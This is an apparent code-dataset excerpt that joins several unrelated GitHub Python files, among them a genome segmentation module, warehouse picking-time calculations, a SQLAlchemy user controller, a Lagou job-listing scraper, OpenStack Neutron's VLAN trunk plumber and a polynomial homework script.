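emo_model = MultinomialNB().fit(Xprompt, yEmotion)
print(classification_report(emotions_testingData, emo_model.predict(prompt_testData)))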
_fold_10_cv(data,lamb):\n k = 10\n ii = list(range(len(data)))\n np.random.shuffle(ii)\n fold_size = len(data)//k\n fold_val = np.empty(10)\n for i in range(k):\n tmp = np.copy(data)\n if i != 9:\n iitmp = ii[i*fold_size:(i+1)*fold_size]\n else:\n iitmp = ii[i*fold_size:]\n target = tmp[iitmp]\n tmp[iitmp] = np.mean(np.delete(tmp,iitmp))\n tmpseg = FPseg.poisseg(tmp,lamb)\n fold_val[i] = poisson(target, tmpseg[iitmp])\n if np.isinf(fold_val[i]):\n embed()\n return np.mean(fold_val)\n\ndef pick_lambda(data, lambdas):\n pass\n\ndef _bed_to_np(bed, chr, start, end):\n bed = [i.strip().split() for i in bed]\n bed = [[*i[:-2], np.array(i[-2].split(','), dtype=int), np.array(i[-1].split(','), dtype=int)] for i in bed]\n bed = filter(lambda x: x[0] == chr, bed)\n labels = np.empty(end-start, dtype=int) \n for i in bed:\n ends = i[-1] + i[-2]\n ii = np.where(np.logical_and(ends > start, i[-1] < end))\n startii = i[-1][ii]-start\n numii = i[-2][ii]\n for k in range(len(startii)):\n if startii[k] < 0:\n s = 0\n else:\n s = startii[k]\n if startii[k]+numii[k] > len(labels):\n e = len(labels)\n else:\n e = startii[k]+numii[k]\n \n labels[s:e] = int(i[3])\n return labels\n\ndef extend_labels(labelchrs, label, interval_starts, interval_ends):\n for l, s, e in zip(label, interval_starts, interval_ends):\n labelchrs[s:e] = l\n\ndef hextodecimal(hexc):\n return f\"{int(hexc[1:3],16)},{int(hexc[3:5],16)},{int(hexc[5:7],16)}\"\n\ndef convert_to_bed(labels,chr):\n unique_labels = np.unique(labels)\n colors = distinctipy.get_colors(len(unique_labels))\n colors = [distinctipy.get_hex(i) for i in colors]\n data = {i:[(0,0)] for i in unique_labels}\n write = False\n currs = 0\n currl = labels[0]\n for i,l in enumerate(labels):\n if l != currl or i == len(labels) - 1:\n data[currl].append((i-currs,currs))\n currl = l\n currs = i\n bbed = \"\"\n comma = \",\"\n for k,i in enumerate(data):\n color = hextodecimal(colors[k])\n data[i].append((1,len(labels)-1))\n bbed = bbed + chr + \"\\t0\\t\" + str(len(labels)) + \"\\t\" + str(i) + \"\\t1000\\t.\\t0\\t\" + str(len(labels)) + \"\\t\" + color + \"\\t\" + str(len(data[i])) + \"\\t\" + comma.join([str(i[0]) for i in data[i]]) + \"\\t\" + comma.join([str(i[1]) for i in data[i]]) + \"\\n\"\n return bbed\n\ndef write_text(text, path):\n with open(path, \"w\") as file:\n file.write(text)\n\ndef copy_binned(outvec, invec, bin_size):\n if len(invec) % bin_size == 0:\n outvec[:] = invec.reshape(-1, bin_size).mean(axis=1)\n else:\n outvec[:-1] = invec[:int(bin_size * (len(outvec)-1))].reshape(-1, bin_size).mean(axis=1)\n outvec[-1] = invec[int(bin_size * (len(outvec)-1)):].mean()\n\nclass GenomeReader:\n '''\n Reader for a genome. It takes a list of bw files. 
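# The helpers above all wrap the same pyBigWig access pattern; shown here
# standalone with a hypothetical file and region:
import numpy as np
import pyBigWig

with pyBigWig.open("sample.bw") as bw:
    vals = np.array(bw.values("chr1", 0, 1000))
np.nan_to_num(vals, copy=False, nan=0)  # missing bases come back as NaN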
It reads a bed file of indexes for training regions and returns the signal values for those regions.\n bwpath: path to the directory where the bw files are restored.\n bedpath: path to the bed files that keeps training indexes.\n binsize: size of the bins\n chrsizes: dictionary of chromosome sizes.\n '''\n def __init__(self, bwpath, binsize, lambdapath, chrsizepath, include):\n self.bwpath = bwpath\n self.binsize = binsize\n self.bwfiles = sorted(glob.glob(os.path.join(self.bwpath,\"*.bw\")))\n self.nbwpath = len(self.bwfiles)\n self.lambdas = _read_arr(lambdapath)\n self.chrsizes = _read_dict(chrsizepath)\n self.include = include\n\n def nbw(self):\n return len(self.bwfiles)\n\n def get_binned_training_mat(self, i):\n '''\n Read the ith training chunk as a matrix with binning.\n '''\n out = np.empty((self.nbwpath, self.get_chunk_size(i)))\n for j, f in enumerate(self.bwfiles):\n _read_from_bigwig_binned(out[j], f, self.chrs[i], self.starts[i], self.ends[i], self.binsize)\n return out, self.starts[i], self.ends[i], self.chrs[i]\n\n def get_binned_training_vec(self, vec, i, j):\n '''\n Read the ith training chunk from jth bw file as a matrix with binning.\n '''\n _read_from_bigwig_binned(vec[:], self.bwfiles[j], self.chrs[i], self.starts[i], self.ends[i], self.binsize)\n return self.start[i], self.ends[i], self.chrs[i], self.bwfiles[j]\n\n def get_exact_training_mat(self, i):\n '''\n Read the ith training chunk as a matrix without binning.\n '''\n out = np.empty((self.nbwpath, self.ends[i] - self.starts[i]))\n for j, f in enumerate(self.bwfiles):\n _read_from_bigwig(out[j], f, self.chrs[i], self.starts[i], self.ends[i])\n return out, self.start[i], self.ends[i], self.chrs[i]\n\n def get_exact_training_vec(self, vec, i, j):\n '''\n Read the ith training chunk from jth bw file as a matrix without binning.\n '''\n _read_from_bigwig(vec[:], self.bwfiles[j], self.chrs[i], self.starts[i], self.ends[i])\n return self.start[i], self.ends[i], self.chrs[i], self.bwfiles[j]\n\n def get_bin(self, chr, index, j, offset):\n out = np.empty(self.binsize)\n _read_from_bigwig(out, self.bwfiles[j], chr, offset + index * self.binsize, offset + (index+1) * self.binsize)\n return out\n\n def read_l0_approx(self, chr, start, end):\n init_size = int(200)\n if end > self.chrsizes[chr]:\n end = self.chrsizes[chr]\n binvec = np.empty(self.binsize)\n length = end - start\n binned_length = int(np.ceil((end - start)/self.binsize))\n mat = np.empty((len(self.bwfiles), length))\n for i, f in enumerate(self.bwfiles):\n _read_from_bigwig(mat[i], f, chr, start, end)\n vecbinned = np.empty(binned_length)\n breakpoints = np.empty(init_size, dtype=int)\n iibreakpoints = 0\n\n for j, f in enumerate(self.bwfiles):\n copy_binned(vecbinned, mat[j], self.binsize)\n bps = l0poissonapproximateCondensed(vecbinned, self.lambdas[j])[1][:-1]\n for k in range(len(bps)):\n s, e = bps[k]*self.binsize, (bps[k]+1)*self.binsize #start+bps[k]*self.binsize, start+(bps[k]+1)*self.binsize\n if e > self.chrsizes[chr]:\n e = self.chrsizes[chr]\n if init_size <= iibreakpoints + k:\n tmp = np.empty(int(init_size * 2), dtype=int)\n tmp[:init_size] = breakpoints\n init_size = int(init_size*2)\n breakpoints = tmp\n\n breakpoints[iibreakpoints+k] = bps[k]*self.binsize+l0poissonbreakpoint(mat[j,s:e]) #start+bps[k]*self.binsize+l0poissonbreakpoint(mat[j,s:e])\n iibreakpoints += len(bps)\n \n breakpoints = np.unique(breakpoints[:iibreakpoints])\n if self.include == \"lengths\":\n out = np.empty((len(breakpoints)+1, len(self.bwfiles)+1))\n mat = mat.T\n if 
len(breakpoints) == 0:\n out[0,:-1] = mat.mean(axis=0)\n out[0,-1] = end - start\n else:\n out[0,:-1] = mat[0:breakpoints[0]].mean(axis=0)\n out[0,-1] = breakpoints[0]\n for i in range(1,len(breakpoints)):\n out[i,:-1] = mat[breakpoints[i-1]:breakpoints[i]].mean(axis=0)\n out[i,-1] = breakpoints[i]-breakpoints[i-1]\n out[-1,:-1] = mat[breakpoints[-1]:].mean(axis=0)\n out[-1,-1] = end - breakpoints[-1] - start\n elif self.include == \"neighbors\":\n out = np.empty((len(breakpoints)+1, 3*(len(self.bwfiles)+1)))\n k = len(self.bwfiles)+1\n mat = mat.T\n if len(breakpoints) == 0:\n out[0,k:2*k-1] = mat.mean(axis=0)\n out[0,2*k-1] = end - start\n out[0,:k] = 0\n out[0,2*k:] = 0 \n else:\n out[0,k:2*k-1] = mat[0:breakpoints[0]].mean(axis=0)\n out[0,2*k-1] = breakpoints[0]\n for i in range(1,len(breakpoints)):\n out[i,k:2*k-1] = mat[breakpoints[i-1]:breakpoints[i]].mean(axis=0)\n out[i,2*k-1] = breakpoints[i]-breakpoints[i-1]\n out[-1,k:2*k-1] = mat[breakpoints[-1]:].mean(axis=0)\n out[-1,2*k-1] = end - breakpoints[-1] - start\n out[1:, :k] = out[:-1,k:2*k]\n out[0, :k] = 0\n out[:-1,2*k:] = out[1:,k:2*k]\n out[-1, 2*k:] = 0 \n else:\n out = np.empty((len(breakpoints)+1, len(self.bwfiles)))\n mat = mat.T\n if len(breakpoints) == 0:\n out[0] = mat.mean(axis=0)\n else:\n out[0] = mat[0:breakpoints[0]].mean(axis=0)\n for i in range(1,len(breakpoints)):\n out[i] = mat[breakpoints[i-1]:breakpoints[i]].mean(axis=0)\n out[-1] = mat[breakpoints[-1]:].mean(axis=0)\n\n\n return out, np.r_[start, start + breakpoints], np.r_[start + breakpoints, end]\n \nclass Segmentor:\n def __init__(self, bwpath, binsize, lambdapath, chrsizepath, bedpath, outputpath, include = None, chunksize = 10000000, nsample=2000, n_components=25, random_state=42, max_iter=2000, covariance_type=\"full\", init_params=\"kmeans\", weight_concentration_prior_type=\"dirichlet_process\"):\n self.reader = GenomeReader(bwpath, binsize, lambdapath, chrsizepath, include)\n self.nsample = nsample\n self.chunksize = chunksize\n self.bedpath = bedpath\n self.chrs, self.starts, self.ends = _read_bed(self.bedpath)\n self.nchunk = len(self.chrs)\n self.chrsizes = _read_dict(chrsizepath)\n self.outputpath = outputpath\n self.rng = np.random.default_rng(seed=42)\n self.gmm = BayesianGaussianMixture(n_components=n_components, random_state=random_state, max_iter=max_iter, covariance_type=covariance_type, init_params=init_params, weight_concentration_prior_type=weight_concentration_prior_type)\n\n def train_gmm(self):\n traindata = np.empty((self.nchunk*self.nsample, self.reader.nbw()))\n for i, c, s, e in zip(range(self.nchunk), self.chrs, self.starts, self.ends):\n tmp = self.reader.read_l0_approx(c,s,e)[0]\n traindata[(i*self.nsample):((i+1)*self.nsample)] = tmp[self.rng.choice(range(tmp.shape[0]), self.nsample, replace=False)]\n self.gmm.fit(traindata)\n\n def label_data(self, verbose=False):\n bed = \"\"\n for i in self.chrsizes.keys():\n labelchrs = np.empty(self.chrsizes[i], dtype=int)\n ii = 0\n cont = True\n while cont:\n s, e = ii, ii+self.chunksize\n ii += self.chunksize\n if e > self.chrsizes[i]:\n e = self.chrsizes[i]\n cont = False\n if verbose: print(f\"Labeling chromosome {i}: {s}-{e}\")\n if verbose: print(f\"\\tReading L0 approximation\")\n data, interval_starts, interval_ends = self.reader.read_l0_approx(i, s, e)\n if verbose: print(f\"\\tCarrying out predictions\")\n labels = self.gmm.predict(data)\n if verbose: print(f\"\\tExpanding labels\")\n extend_labels(labelchrs, labels, interval_starts, interval_ends)\n bed += 
convert_to_bed(labelchrs, i)\n if verbose: print(f\"\\tWriting labels\")\n write_text(bed, self.outputpath)\n\n","repo_name":"boooooogey/FPseg","sub_path":"FPseg/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":15258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4681659074","text":"# Import modules\nimport pandas as pd\nimport datetime\nfrom wagonworks.get_data import get_day_data\n\n\n# Process time should beinput arguments\nprocess_tasks_time = {'scan_time': 3,\n 'confirm_location': 2,\n 'pick_time': 8,\n 'confirm_pick': 2,\n 'confirm_box': 5}\n\n\ndef discrete_time(order_df, process_tasks_time):\n '''\n This function calculates the total time to complete all given orders using\n discrete picking method.\n Input is:\n - order_df: a dataframe containing all the order IDs and corresponding SKU\n IDs to be\n completed. (Possibly recommend orders in one hour)\n - process_tasks_time: a dictionary containing the process tasks per order\n and their average time.\n\n Output is:\n - Dataframe with:\n - Del_Number: Order ID\n - Discrete_travel_time: the return travel time per order\n - Discrete_total_order_time: the total time per order (travel time and\n process time)\n - The total time to complete all orders (in days/hours)\n '''\n\n # Get sku_location_time reference table which gives a one-way travel time\n # for each location zone and SKU\n sku_location_time_df = pd.read_csv(\n '../raw_data/reference_data/sku_location_time.csv')\n\n # Merge order_df and sku_location_time_df to get the average travel time\n # for each SKU\n order_merge_df = order_df.merge(sku_location_time_df,\n how='left',\n on='SKU',\n copy=False)\n\n # Group together by order number to get the total travel time per order\n order_grouped_df = order_merge_df.groupby('Del_Number').sum('TIME') * 2\n\n # Calculate total order time (adding on process time)\n order_grouped_df['Discrete_total_order_time'] = \\\n order_grouped_df['TIME'] + sum(process_tasks_time.values())\n\n # Keep only time columns\n order_grouped_df = order_grouped_df[['TIME', 'Discrete_total_order_time']]\n\n # Change column names\n order_grouped_df.columns = ['Discrete_travel_time',\n 'Discrete_total_order_time']\n\n # Convert seconds to hh:mm:ss format\n total_time_sec = int(order_grouped_df['Discrete_total_order_time'].sum())\n total_time = str(datetime.timedelta(seconds=total_time_sec))\n\n # Return the total time it takes to complete all orders\n return order_grouped_df, total_time\n\n\ndef batch_time(order_df, batch_df, process_tasks_time, sort_time=20):\n '''\n Input is:\n - order_df: a dataframe containing all the order IDs and corresponding SKU\n IDs to be completed.\n - batch_df: a dataframe containing all the order IDs and corresponding\n batch IDs from batching analysis.\n - sku_location_time_df: a reference dataframe containing all unique\n possible SKU IDs with their corresponding location zone and average one-way\n travel time.\n - sort_time: time it takes to sort each SKU in a batch\n - process_tasks_time: a dictionary containing the process tasks per order\n and their average time.\n Output is:\n - Dataframe with:\n - Batch_Number\n - Total_batch_time: time per batch + process time per batch\n - The total time to complete all orders (in days/hours)\n '''\n\n # Get sku_location_time reference table which gives a one-way travel time\n # for each location zone and SKU\n sku_location_time_df = \\\n 
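# A hedged usage sketch for discrete_time above; the order IDs and SKUs are
# invented, and the reference CSV hard-coded in the function must exist:
import pandas as pd

orders = pd.DataFrame({'Del_Number': [1, 1, 2], 'SKU': ['A1', 'B2', 'A1']})
per_order_df, total = discrete_time(orders, process_tasks_time)
print(per_order_df)
print(total)  # total time formatted as h:mm:ss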
pd.read_csv('../raw_data/reference_data/sku_location_time.csv')\n\n # Merge order_df and batch_df so that we can associate batch and SKU IDs\n order_merged_df = order_df.merge(batch_df,\n how='left',\n on='Del_Number',\n copy=False)\n\n # Separate SKU-dependent process tasks and order-dependent process tasks:\n # Scan time is incorporated into sorting time for batches so is no longer\n # included in this step, confirm location, pick time and confirm pick all\n # happen once per SKU in a batch finally, confirm box will happen once per\n # order\n SKU_keys = ['confirm_location', 'pick_time', 'confirm_pick']\n SKU_process_time = {key: process_tasks_time[key] for key in SKU_keys}\n order_process_time = process_tasks_time['confirm_box']\n\n # Calculate time per batch\n # Get number of batches for loop range\n max_batch = order_merged_df['Batch_Number'].max()\n\n # Create empty dataframe to fill\n batch_time_df = pd.DataFrame({'Batch_Number': [],\n 'Batch_Time': []}, dtype=int)\n\n for batch in range(max_batch + 1):\n # Get all unique SKUs in each batch\n batch_grouped_df = \\\n pd.DataFrame(\n order_merged_df[order_merged_df['Batch_Number'] == batch]['SKU'].unique())\n batch_grouped_df.columns = ['SKU']\n\n # Merge SKUs list with sku_location_time_df\n batch_SKUs_merged_df = \\\n batch_grouped_df.merge(sku_location_time_df,\n how='left',\n on='SKU',\n copy=False).drop('SKU LOCATION', axis=1)\n\n # Add a column with total time per SKU in the batch\n batch_SKUs_merged_df['total_SKU_time'] = batch_SKUs_merged_df['TIME'] \\\n * 2 + sort_time\n\n # Drop time column\n batch_SKUs_merged_df = batch_SKUs_merged_df.drop('TIME', axis=1)\n\n # Create a dataframe with Batch_Number and time\n # First get number of orders in the batch to multiply by order process\n # task time\n n_orders = len(\n order_merged_df[order_merged_df['Batch_Number'] == batch].groupby(\n 'Del_Number').count())\n process_time = sum(SKU_process_time.values()) + order_process_time * \\\n n_orders\n batch_time = batch_SKUs_merged_df['total_SKU_time'].sum() + \\\n process_time\n batch_time_df.loc[batch, ['Batch_Number', 'Batch_Time']] = \\\n [batch, batch_time]\n\n # Convert seconds to hh:mm:ss format\n total_time_sec = int(batch_time_df['Batch_Time'].sum())\n total_time = str(datetime.timedelta(seconds=total_time_sec))\n\n # Convert final dataframe to int\n batch_time_df = batch_time_df.astype(int)\n\n return batch_time_df, total_time\n\n","repo_name":"hunsa10/wagonworksui","sub_path":"wagonworksui/travel_time.py","file_name":"travel_time.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69813034794","text":"N = int(input())\n*L, = map(int, input().split())\n\ninc=0\ndec=0\n# 1 2 3 4 5\nfor i in range(N-1,-1,-1):\n if L[i-1]<=L[i]:\n continue\n else:\n inc=i\n break\n\nmx1=1\n\n# 1 4 2 3 5\nif L[0]>=L[N-1]:\n for i in range(1,inc):\n if L[i-1]<=L[i]:\n continue\n else:\n mx1=-1\n break\nelse:\n if inc!=0:\n mx1=-1\n\nif mx1>0:\n mx1=inc\n\n\nfor i in range(N-1,-1,-1):\n if L[i-1]>=L[i]:\n continue\n else:\n dec=i\n break\n\nmx2=1\nif L[0]<=L[N-1]:\n for i in range(1,dec):\n if L[i-1]>=L[i]:\n continue\n else:\n mx2=-1\n break\nelse:\n if dec!=0:\n mx2=-1\nif mx2>0:\n mx2=dec\n\nif mx1<0 and mx2<0:\n print(-1)\nelse:\n if mx1<0:\n print(mx2)\n elif mx2<0:\n print(mx1)\n else:\n 
print(min(mx1,mx2))\n","repo_name":"JannaKim/PS","sub_path":"contest/20127_Y수열1114.py","file_name":"20127_Y수열1114.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33893251310","text":"import logging\n\nfrom app.models.users import User\nfrom app.schemas.users import UserCreate, UserUpdate\nfrom sqlalchemy.orm import Session\nfrom typing import List\nfrom uuid import UUID\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass UserController:\n @classmethod\n def get_users(cls, db: Session) -> List[User]:\n return db.query(User).order_by(User.username.asc()).all()\n\n @classmethod\n def get_user(cls, db: Session, id: UUID) -> User:\n return db.query(User).filter_by(id=id).one()\n\n @classmethod\n def create_user(cls, db: Session, payload: UserCreate) -> User:\n user = User()\n user.username = payload.username\n user.is_admin = payload.is_admin\n \n db.add(user)\n db.commit()\n\n return user\n\n @classmethod\n def update_user(cls, db: Session, id: UUID, payload: UserUpdate) -> User:\n user = cls.get_user(db, id)\n user.is_admin = payload.is_admin\n\n db.commit()\n\n return user\n\n @classmethod\n def delete_user(cls, db: Session, id: UUID) -> None:\n user = cls.get_user(db, id)\n\n db.delete(user)\n db.commit()\n\n @classmethod\n def get_or_create_user(cls, db: Session, username: str, is_admin: bool) -> User:\n user = db.query(User).filter_by(username=username).first()\n\n if not user:\n user = cls.create_user(db, UserCreate(username=username, is_admin=is_admin))\n else:\n if user.is_admin != is_admin:\n user = cls.update_user(db, user.id, UserUpdate(is_admin=is_admin))\n\n return user\n","repo_name":"rclsilver/face-recognition","sub_path":"server/app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5906827554","text":"from loguru import logger\nfrom models.db import db\n\n\nclass Answer(db.Model):\n __tablename__ = \"answers\"\n id = db.Column(db.Integer, primary_key=True)\n value = db.Column(db.String())\n is_true = db.Column(db.Boolean())\n question_id = db.Column(db.Integer, db.ForeignKey('questions.id'),\n nullable=False)\n\n def __init__(self, question_id: int, value: str, is_true: bool):\n self.question_id = question_id\n self.value = value\n self.is_true = is_true\n\n def render(self) -> dict:\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n\n def __str__(self):\n return self.value\n\n @staticmethod\n def get_all_possible_answers(identifiant: int) -> list['Answer']:\n answers = Answer.query.filter_by(question_id=identifiant).all()\n db.session.commit()\n return answers\n\n @staticmethod\n def get_good_answer(identifiant: int) -> list['Answer']:\n answers = Answer.query.filter_by(question_id=identifiant).all()\n db.session.commit()\n answer = [answer for answer in answers if answer.is_true is True]\n return answer\n\n @staticmethod\n def create_answer(question_id: int, value: str, is_true: bool) -> None:\n answer = Answer(question_id, value=value, is_true=is_true)\n db.session.add(answer)\n db.session.commit()\n\n @staticmethod\n def delete_answer_by_id(identifiant: int) -> None:\n answer = Answer.query.filter_by(id=identifiant).first()\n db.session.delete(answer)\n 
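# A hedged usage sketch for UserController above; the engine URL and session
# factory are assumptions, and the schema is presumed to already exist:
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

SessionLocal = sessionmaker(bind=create_engine("sqlite:///app.db"))
db = SessionLocal()
user = UserController.get_or_create_user(db, "alice", is_admin=False)
print(user.id, user.is_admin)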
db.session.commit()\n","repo_name":"Seedsir/zeventquizz","sub_path":"models/answers/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34761728660","text":"\"\"\"\nthis is my first project to grab the iOS job info data from Lagou.com using Python\n\"\"\"\n\n__author__ = 'Yongxiang Miao'\n\nimport re\nimport time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom openpyxl import Workbook\n\nworkbook = Workbook()\ntab1 = workbook.active\ntab1.title = 'iOS开发招聘'\ndest_filename = 'iOS开发招聘数据.xlsx'\n\nBASE_URL = 'https://www.lagou.com/zhaopin/iOS/'\n\nRUN_TIME = 1\n\ndef randomChoices():\n proxy = ['http://163.125.149.106:9999',\n 'http://111.121.193.214:3128',\n 'https://122.72.18.35:80',\n 'http://114.115.182.59:3128',\n 'https://118.212.137.135:31288']\n agent = ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.2) Gecko/2008070208 Firefox/3.0.1',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)']\n\n return random.choice(proxy), random.choice(agent)\n\n\ndef get_html(url):\n p, a = randomChoices()\n headers = dict(Connection='keep-alive')\n headers['User-Agent'] = a\n proxies = dict(http=p)\n data = requests.get(url, headers=headers, proxies=proxies).content\n\n return data\n\ndef parser_html(data):\n soup = BeautifulSoup(data, 'html.parser')\n pos_list = soup.select('ul.item_con_list > li')\n\n company = []\n position = []\n experience = []\n salary = []\n address = []\n\n for i in pos_list:\n\n c = i.get('data-company')\n p = i.find('h3').get_text()\n a = i.find('span', attrs={'class': 'add'}).get_text()\n li_b_l = i.find('div', attrs={'class': 'li_b_l'})\n e = li_b_l.find(text=re.compile('经验'))\n e = re.sub('\\s', '', e)\n s = li_b_l.find('span', attrs={'class': 'money'}).get_text()\n\n company.append(c)\n position.append(p)\n experience.append(e)\n salary.append(s)\n address.append(a)\n\n page = soup.find('a', attrs={'class': 'next'})\n if page:\n next_url = page['href']\n global RUN_TIME\n if RUN_TIME == 2:\n next_url += '?filterOption=2'\n elif RUN_TIME >= 3:\n next_url += '?filterOption=3'\n RUN_TIME += 1\n\n print('====================== : %s', next_url)\n\n return company, position, experience, salary, address, next_url\n return company, position, experience, salary, address, None\n\ndef main():\n\n global BASE_URL\n url = BASE_URL\n\n com = []\n pos = []\n exp = []\n sal = []\n add = []\n\n while url:\n data = get_html(url)\n co, po, ex, sa, ad, url = parser_html(data)\n\n com += co\n pos += po\n exp += ex\n sal += sa\n add += ad\n\n time.sleep(5)\n\n for c_, p_, e_, s_, a_ in zip(com, pos, exp, sal, add):\n col_A = 'A%s' % (com.index(c_) + 1)\n col_B = 'B%s' % (com.index(c_) + 1)\n col_C = 'C%s' % (com.index(c_) + 1)\n col_D = 'D%s' % (com.index(c_) + 1)\n col_E = 'E%s' % (com.index(c_) + 1)\n\n tab1[col_A] = c_\n tab1[col_B] = p_\n tab1[col_C] = e_\n tab1[col_D] = s_\n tab1[col_E] = a_\n\n workbook.save(filename=dest_filename)\n\n\nif __name__ == '__main__':\n main()","repo_name":"smilingmiao/Python","sub_path":"Lagou_iOS-1.py","file_name":"Lagou_iOS-1.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8672774511","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not 
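# A hedged variant of get_html above: same flow, plus a timeout and a status
# check so a dead proxy fails fast instead of hanging indefinitely:
def get_html_safe(url):
    p, a = randomChoices()
    resp = requests.get(url, headers={'Connection': 'keep-alive', 'User-Agent': a},
                        proxies={'http': p}, timeout=10)
    resp.raise_for_status()
    return resp.content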
use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib.utils import runtime\nfrom oslo_concurrency import lockutils\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\n\nfrom neutron.agent.linux import ip_lib\nfrom neutron.plugins.ml2.drivers.linuxbridge.agent.common import utils as lutil\n\nLOG = logging.getLogger(__name__)\n\n\nclass Plumber(object):\n \"\"\"Object responsible for VLAN interface CRUD.\n\n This handles the creation/deletion/listing of VLAN interfaces for\n a trunk within a namespace.\n \"\"\"\n\n def __init__(self, namespace=None):\n self.namespace = namespace\n\n def trunk_on_host(self, trunk):\n \"\"\"Returns true if trunk device is present else False.\"\"\"\n trunk_dev = self._trunk_device_name(trunk)\n return ip_lib.device_exists(trunk_dev, namespace=self.namespace)\n\n def ensure_trunk_subports(self, trunk):\n \"\"\"Idempotent wiring for a trunk's subports.\n\n Given a trunk object, delete any vlan subinterfaces belonging to a\n trunk that aren't on the object. Create any which are on the object\n which do not exist.\n \"\"\"\n trunk_dev = self._trunk_device_name(trunk)\n with self._trunk_lock(trunk_dev):\n # lock scoped to trunk device so two diffs don't interleave\n expected = self._get_subport_devs_and_vlans(trunk.sub_ports)\n existing = self._get_vlan_children(trunk_dev)\n to_delete = existing - expected\n to_create = expected - existing\n for devname, vlan_id in to_delete:\n LOG.debug(\"Deleting subport %(name)s with vlan tag %(tag)s\",\n dict(name=devname, tag=vlan_id))\n self._safe_delete_device(devname)\n for devname, vlan_id in to_create:\n LOG.debug(\"Creating subport %(name)s with vlan tag %(tag)s\",\n dict(name=devname, tag=vlan_id))\n self._create_vlan_subint(trunk_dev, devname, vlan_id)\n\n def delete_trunk_subports(self, trunk):\n return self.delete_subports_by_port_id(trunk.port_id)\n\n def delete_subports_by_port_id(self, port_id):\n device = self._get_tap_device_name(port_id)\n if not ip_lib.device_exists(device, namespace=self.namespace):\n LOG.debug(\"Device %s not present on this host\", device)\n return\n with self._trunk_lock(device):\n for subname, vlan_id in self._get_vlan_children(device):\n LOG.debug(\"Deleting subport %(name)s with vlan tag %(tag)s\",\n dict(name=subname, tag=vlan_id))\n self._safe_delete_device(subname)\n\n def _trunk_lock(self, trunk_dev):\n lock_name = 'trunk-%s' % trunk_dev\n return lockutils.lock(lock_name, runtime.SYNCHRONIZED_PREFIX)\n\n def _create_vlan_subint(self, trunk_name, devname, vlan_id):\n ip_wrap = ip_lib.IPWrapper(namespace=self.namespace)\n try:\n dev = ip_wrap.add_vlan(devname, trunk_name, vlan_id)\n dev.disable_ipv6()\n except Exception:\n with excutils.save_and_reraise_exception() as ectx:\n ectx.reraise = ip_lib.IPDevice(\n devname, namespace=self.namespace).exists()\n\n def _safe_delete_device(self, devname):\n dev = ip_lib.IPDevice(devname, namespace=self.namespace)\n try:\n dev.link.set_down()\n dev.link.delete()\n except Exception:\n with excutils.save_and_reraise_exception() as ectx:\n ectx.reraise = dev.exists()\n\n def _trunk_device_name(self, 
trunk):\n        return self._get_tap_device_name(trunk.port_id)\n\n    def _get_subport_devs_and_vlans(self, subports):\n        return {(self._get_tap_device_name(s.port_id),\n                 s.segmentation_id)\n                for s in subports}\n\n    def _get_tap_device_name(self, devname):\n        return lutil.get_tap_device_name(devname)\n\n    def _get_vlan_children(self, dev):\n        \"\"\"Return set of (devname, vlan_id) tuples for children of device.\"\"\"\n        devices = ip_lib.get_devices_info(namespace=self.namespace)\n        return {(device['name'], device['vlan_id']) for device in devices\n                if device.get('kind') == 'vlan' and\n                device.get('parent_name') == dev}\n","repo_name":"openstack/neutron","sub_path":"neutron/services/trunk/drivers/linuxbridge/agent/trunk_plumber.py","file_name":"trunk_plumber.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"11417854863","text":"\"\"\"\n2021/CAU/CS/DATA STRUCTURE\n20172674 신동녘\nHW1\nPolynomial2\n\"\"\"\n\n\n# Polynomial class definition\nclass polynomial():\n    def __init__(self, coef):\n        self.coef_deg = coef\n        self.degree = len(coef)\n\n    # Print the polynomial\n    def print_poly(self):\n        for i in range(self.degree):\n            if i == self.degree - 1:\n                print(\"%d\" % (abs(self.coef_deg[i][0])))\n            else:\n                if self.coef_deg[i][0] != 0:\n                    print(\"%d * x^%d\" % (abs(self.coef_deg[i][0]), self.coef_deg[i][1]), end='')\n                    if self.coef_deg[i+1][0] >= 0:\n                        print(\" + \", end='')\n                    else:\n                        print(\" - \", end='')\n\n    # Evaluate the polynomial at a value\n    def calc_poly(self, num):\n        result = 0\n        for i in range(0, self.degree):\n            result += self.coef_deg[i][0] * pow(num, self.coef_deg[i][1])\n        return result\n\n\n# Add two polynomials\ndef poly_add(a, b):\n    z = [] # polynomial that holds the result\n    apos = bpos = 0 # indexes for scanning the two term arrays sequentially\n    degree_a = a.degree # number of terms in polynomial a\n    degree_b = b.degree # number of terms in polynomial b\n\n    while (apos < degree_a) and (bpos < degree_b):\n        # if a's exponent is higher\n        if a.coef_deg[apos][1] > 